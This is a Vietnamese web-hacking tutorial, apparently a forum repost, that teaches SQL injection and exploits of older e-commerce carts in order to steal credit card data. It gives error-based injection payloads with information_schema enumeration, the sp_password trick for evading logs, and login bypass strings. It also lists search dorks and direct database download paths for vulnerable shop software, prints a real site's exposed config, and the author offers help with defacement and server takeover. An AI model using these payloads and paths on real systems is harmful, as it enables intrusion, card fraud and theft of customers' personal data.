TUTORIAL FROM VIETHACKER
Các bạn đã nghe rất nhiều từ sql-injection rất nhiều bạn thành thạo nhưng vẫn còn nhiều bạn mới làm wen với lập trình
web còn chưa biết tôi xin mạn phép post lại dựa trên các bài về sql-ịnect từ nhóm Vicki , Viethacker.net ...hay một vài
nơi khác .
+ SQL Injection là gì?
SQL Injection là một trong những kiểu hack web đang dần trở nên phổ biến hiện nay. Bằng cách inject các mã SQL
query/command vào input trước khi chuyển cho ứng dụng web xử lí, bạn có thể login (với quyền Admin) mà không
cần username và password, remote execution, dump data và lấy root của SQL server. Công cụ dùng để tấn công là một
trình duyệt web bất kì, chẳng hạn như Internet Explorer, Netscape,..
+ Vâng hiểu về SQL-Ịnect đơn giản là chỉ có vậy tôi sẽ phân tích tiếp việc khai thác lỗi đó như thế nào , và mỗi người
đều có những cách xử lý riêng
VD :
/>- kiểm tra xem có lỗi không : thêm dấu ' vào :
/>Nếu thấy hiển thị lỗi :có dạng vd như thế này :
CODE
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ''.
C:\INETPUB\WWWROOT\xxx\INCLUDE\../lib/dblib.asp, line 95
Thì trang web này bị SQL-Inject chúng ta có thể hoàn toàn khai thác được thông qua việc "Hỏi Đáp" -->
Nhiều bạn khi test thấy lỗi như vậy liền dùng câu lệnh lấy hết các bảng , cột trong data:
/>Sẽ thu được kết quả là bảng đầu tiên:
CODE
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value
'T005_CC_PACKAGES' to a column of data type int.
C:\INETPUB\WWWROOT\xxx\INCLUDE\../lib/dblib.asp, line 95
'T005_CC_PACKAGES' chính là 1 bảng trong data . Nếu muốn lấy tên bảng tiếp theo ta chỉ việc
where table_name not in
('T005_CC_PACKAGES' )))--
tiếp tục cho đến khi nào hiện thông báo : Invalid item thì là hết table đó
Muốn lấy tên cột trong bảng thì làm như sau :

where table_name='tên bảng'))--
lấy tiếp thì lại dùng not in:
where table_name="tên bảng" not in ('Tên cột đã
biết','tên cột đã biết')))--
Lấy giá trị trong cột :
cột'%20from 'tên bảng chứa cột'))--
Mục đích của nhiều bạn là lấy hết toàn bộ thông tin về table , colum của data từ đó
để khai thác tài khoản đăng nhập admin của site đó . Nhưng những cách từng bước trên rất mệt khi đường Link dài quá
IE lỗi luôn đó phải dùng trình duyệt khác(Mozila hay Netscape..) .
+ Có cách khác nhanh hơn :
Đăng nhập bằng user: 'or''=' pass: 'or''='
vd nếu bạn may mắn thì sẽ tìm được chỗ login vào phần quản lý web.
Tổng hợp cách hack cc căn bản nhất!
Thường các hacker hack cc từ những lỗi nghiêm trọng của các site bán hàng trên toàn thế giới (còn vô số những site
chưa fix )...các lỗi thường gặp là :
acart2_0
SalesCart Database Storage Insecurity
Trong file shopper.cgi
Cart32 Sites
VP-ASP
ProductCar
............
Dưới đây là bài viết chi tiết cách hack các lỗi đó, tất nhiên cũng ko phải tui tìm ra được các lỗi này...vì các lỗi này đựoc
tìm ra rất lâu rùi...được sang qua sang lại....đến nỗi tác giả của nó là ai cũng ko còn nhớ nỗi nữa...!!!
---------------------------------------------------------------------------------------------
Lỗi acart2_0" :
Đầu tiên các bạn vào ( các bạn có thể vào các site tìm kiếm khác như .... ) search
keyword "acart2_0" ,bạn thấy rất nhiều file mắc lỗi này,do kinh nghiệm mình khuyên các bạn nên chọn những site có
dạnghttp://url/acart2_0/ ví dụ site ,gõ thêm" /acart2_0.mdb "vào đằng sau url,
enter xong bạn thấy màn hình dơnload là thành công rùi đó...bạn có thể down toàn bộ file database *.mdb của shop bán

hàng đó...
---------------------------------------------------------------------------------------------
Lỗi VP-ASP:
đầu tiên vào search từ khoá "shopdisplaycategories" click vào site bạn sẽ thấy làhttp://www.
sitename.com/shopping/shopdisplaycategories.asp
Việc tiếp theo là chuyển url thành urlhttp://www.
sitename.com/shopping/shopdbtest.asp nghĩa là thay shopdisplaycategories.asp bằng shopdbtest.asp rồi enter...nếu ra
tiếp thêm một trang nữa...<---ko phảt là no page .thì bạn có cơ hội down *mdb của site này đó...
sau khi ra trang mới xong,áp dụng công thức http:// [vp-asp site] / [ vp-asp dir] / [ xDatabase + .mdb ]
-[vp-asp site] là : />-[ vp-asp dir] là :shopping
-[ xDatabase + .mdb ] sẽ là shopping.mdb
nếu có màn hình save thì bạn thành công rùi đó...
-----------------------------------------------------------------------------------------------
Lỗi shopper.cgi:
vào search từ khoá shopper.cgi hoặc shopper.execopy những url có dạng sitename.com/cgi-bin/
shopper.cgi?
sau đó paste vào browse và thêm dòng search=action&keywords=ccpower &template=shopper.conf hoặc hoặc thêm
dòng search=action&keywords=ccpower &template=order1.log vào đằng sau,nếu may mắn bạn sẽ tìm thấy
cc----------------------------------- Lỗi ProductCart:
Search với từ khóa allinurl: /productcart/
/>Xóa tất cả từ sau ProductCart đi gữ lại đoạn này sau đó thêm vào sau database/
EIPC.mdb sẽ thành đến lúc này ta sẽ download được file .mdb
về sau khi download về rùi thì chắc mọi người biết phải làm gì rồi chứ
................................................
Lỗi Cart32.exe:
vào google.com ,search từ khóa "Cart32.exe v3"đầu tiên vào />Lấy Credit Cards : />hoặc : />Hack CC thông qua lỗi SalesCart Database Storage Insecurity:
Tổng quát: Lỗi này thực chất là dữ liệu của các chương trình mua bán không được bảo mật, mã hóa hay cất giữ cẩn
thận nên bạn hoàn toàn có thể lấy chúng một cách dễ dàng
Lưu ý: đôi khi với thực tế, 1 số link có thể khác đi, không phải lúc nào cũng hoàn toàn đúng, dữ liệu có khi bao gồm cả
CRD (Credit Card) nên mọi việc phải qua proxy (nếu không có proxy thì có thể ra dịch vụ...)

Khai thác: Hãy sử dụng 1 trong những link sau:
www.victim.com/fpdb/shop.mdb
www.victim.com/shoponline/fpdb/shop.mdb
www.victim.com/database/metacart.mdb
www.victim.com/shopping/database/metacart.mdb
www.victim.com/shop/database/metacart.mdb
www.victim.com/metacart/database/metacart.mdb
www.victim.com/mcartfree/database/metacart.mdb
www.victim.com/ASP/cart/database/metacart.mdb
Ví dụ: site84vn.com có thể download cc từ đây:www.84vn.com/database/metacart.mdb
Có nghĩa là database không hề có 1 chút bảo mật nào cả. Download vô tư ! Trong database có thể bao gồm: name,
surname, address, e-mail, phone number, credit card number, company name.....
Bạn có thể khai thác dữ liệu này, nhưng trong thực tế, mọi việc không phải lúc nào cũng suôn sẻ cả, bạn hãy tưởng
tượng mỗi server có một cấu trúc riêng, ví dụ như đường dẫn không phải lúc nào cũng là fpdb/... hay như những link
trên, hãy tận dụng lỗi và thử từng cái một , nhiều khi làwww.victim.com/muaban/fpdb/shop.mdb vì vậy nếu bạn xài
cách này hãy linh hoạt trong link tuỳ vào từng site! <----copy by h4a......
lên google tìm từ khóa
"inurl:commerce.cgi"
Rồi okie số địa chỉ online đang chờ đón
vd:
ta có site
< />xóa cái commerce.cgi? đi thay bằng Admin_files/commerce_user_lib.pl
ta sẽ được
## This file contains the user specific variables
## necessary for Commerce.cgi
$sc_sales_tax = ".0825";
$sc_sales_tax_state = "NY";
$sc_send_order_to_email = "yes";
$sc_order_log_name = "onlinebookstore.log";
$sc_send_order_to_log = "yes";

$shipping_percentage = ".15";
$sc_order_email = "wrl\@igc.org";
$sc_root_url = " />$sc_admin_email = "lit\@warresisters.org";
$sc_domain_name_for_cookie = ".warresisters.org";
$sc_order_script_url = " />$sc_root_web_path = "/home/serve/resist/Html/Products";
$sc_path_for_cookie = "/store";
$path_to_html = "../Html";
1;
xóa cái commerce_user_lib.pl đi thay bằng onlinebookstore.log (tìm ở $sc_order_log_name ) và ....
Việc tiếp theo là thuộc về bạn
------------------------------------------------------------------------------------------------
Vào google gõ từ khoá tek9.aspta được link có dạng tương tự như thế này
/>bắy đầu từ /tek9.asp/ gõ thêm /intranet />Sau đó đăng nhập với user và pass 'or''='nếu may mắn thì sẽ vào được , và ăn cc tha hồ
còn rất nhiều site bị lỗi này
------------------------------------------------------------------------------------------------
Search keyword in google.com.vn : " Shoping /admin "
/> />user/pass : ' or 1=1--
Code của site cho phép exploit lên SQL Server .
------------------------------------------------------------------------------------------------
Hack shop qua lỗi SQL server injection
gioi thieu so qua cho anh em biet ve hack sql server inject ha !
hack bang ky thuat convert noi nom na la convert 1 bieu thuc dang string sang dang int nhung ko the
thuc hien duoc gay thong bao loi (co nhung shop ma ta khong nhan duoc thong bao cua no,vi
value=hidden),vi the truoc tien de hack duoc shop ODBC MySQL server2000 hay 7.0 thi it nhat anh
em cung phai xem qua source 1 chut ha,de roi con biet co nen hack theo cach nao`.
o day chi gioi thieu cach convert dung` de lay thong bao loi thoi,neu may bac' can hack ca server thi
noi nhieu,noi dai dong lam...
Detail:
search tren cac trang search engine tuy anh em thich thoi,hien co rat nhieu trang search engine ma anh
em thuong dung nhu

hoac /> /> />yahoo.com
......
ok----search for: allinurl: "/shop/viewproduct.asp" hoac may bac co the search = tu key word allinurl:
"/shop/index.asp" (nhung cai tu khoa nay van chua xac nhan duoc tinh dung dan cua no,vi no cho ra
tat rat nhieu site,ma ko phai ODBC MySQL database,hic,ma thuong la` JSP(java server page) hoac
JET, hoac VB.net....net va de nay can phai co su no luc cua anh em trong viec test.
ok
co' duoc muc tieu roi chon dai 1 thang,vd:
/> />okay co muc tieu roi bat dau test no ha
/>neu CSDL cua no duoc viet = ODBC MySQL server thi anh em se nhan duoc thong bao sau
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ''.
/shop/include/viewproduct.asp, line 3
okay,con neu ko thi ko thay gi het,hoac la` ban phai xem trong source de biet.
ok bat dau tim table
co the test theo cac cach sau ma em da biet
;having 1=1--sp_password
'having 1=1--sp_password
"having 1=1--sp_password
(having 1=1--sp_password
)having 1=1--sp_password
(space)having 1=1--_sp_password (%20 la space la khoang trang day)
thuong thi test = cau truy van (space)having 1=1--sp_password la duoc duyet qua ok
*luu y' cac anh em 1 dieu rat can thiet
1--%2b co nghia la dau + nhung ma truyen truc tiep dau + vao se bi SQL filter mat bat buoc phai co --sp_password de
marks log tranh bi phat hien
/> Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'categories.label' is invalid in the select list because it is
not contained in an aggregate function and there is no GROUP BY clause.
/shop/include/viewproduct.asp, line 9

ta biet duoc table categories,column la label,bay gio ta di lay tat ca cac table cua column label thuoc table categories
bay gio di lay user_name cua shop thong qua cau truy van sau
%2bconvert(int,user_name())--sp_password
day du la`
/>Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'braunshop' to a
column of data type int.
/shop/include/viewproduct.asp, line 3
'braunshop' la truong user_name cua shop
*luu y
2--truong user_name() la de xac dinh user hien tai,neu no la dbo thi ta co kha nang hack thang vao ca server ma ko can
quyen admin,con neu ko thi ta co nhung buoc trung gian de chiem,ok ta dung lai o viec lay cc tu shop ma thoi,ko noi
den chuyen chiem ca server,much dich de anh em hoc hoi,va trao doi kinh nghiem la chinh,ko loi keo anh em pha hoai
nghiem trong den bat cu ai khac nen toi chi post va dung lai o phan lay cc ma thoi,con neu ai co thu oan gi voi thang
nao,muon deface,lay pass,lay root,lay server,host thi lien he voi toi
ok bay gio ta se lan luot lay cac table tren column label
lay table thu 1 thong qua cau truy van sau
%2bconvert(int,(select%20top%201%20table_name%20fr om%20information_schema.tables))--sp_password
day du la`
/>Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'categorieslist' to a
column of data type int.
/shop/include/viewproduct.asp, line 3
ok table 1 la 'categorieslist',muon lay table thu 2 thi phai dung den where table_name not in('table1')
cau truy van nhu sau:
%2bconvert(int,(select%20top%201%20table_name%20fr om%20information_schema.tables%20where%
20table_name%20not%
20in('categorieslist')))--sp_password
/>Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'allorders' to a column

of data type int.
/shop/include/viewproduct.asp, line 3
table 2 la` 'allorders'
muon lay table thu 3 va cac table co lai thi tiep tu lam tuong tu nhu lay table thu 2 vay
%2bconvert(int,(select%20top%201%20table_name%20fr om%20information_schema.tables%20where%
20table_name%20not%
20in('categorieslist','allorders')))--sp_password
day la tat ca cac table cua shop vua lay duoc
'categorieslist','allorders','categories','categor ymembers','deliveryZones','dtproperties','essorder s','fullorder','keywords',
'optiongroupmembers','optiongroups','optiongroupsl ist','optionmembers','options','optionslist','orde
roptions','orderoptions-options','orderproducts','orderproducts-products','orders','products','products-
categories','products-options','searchresults','sysconstraints','syssegm ents'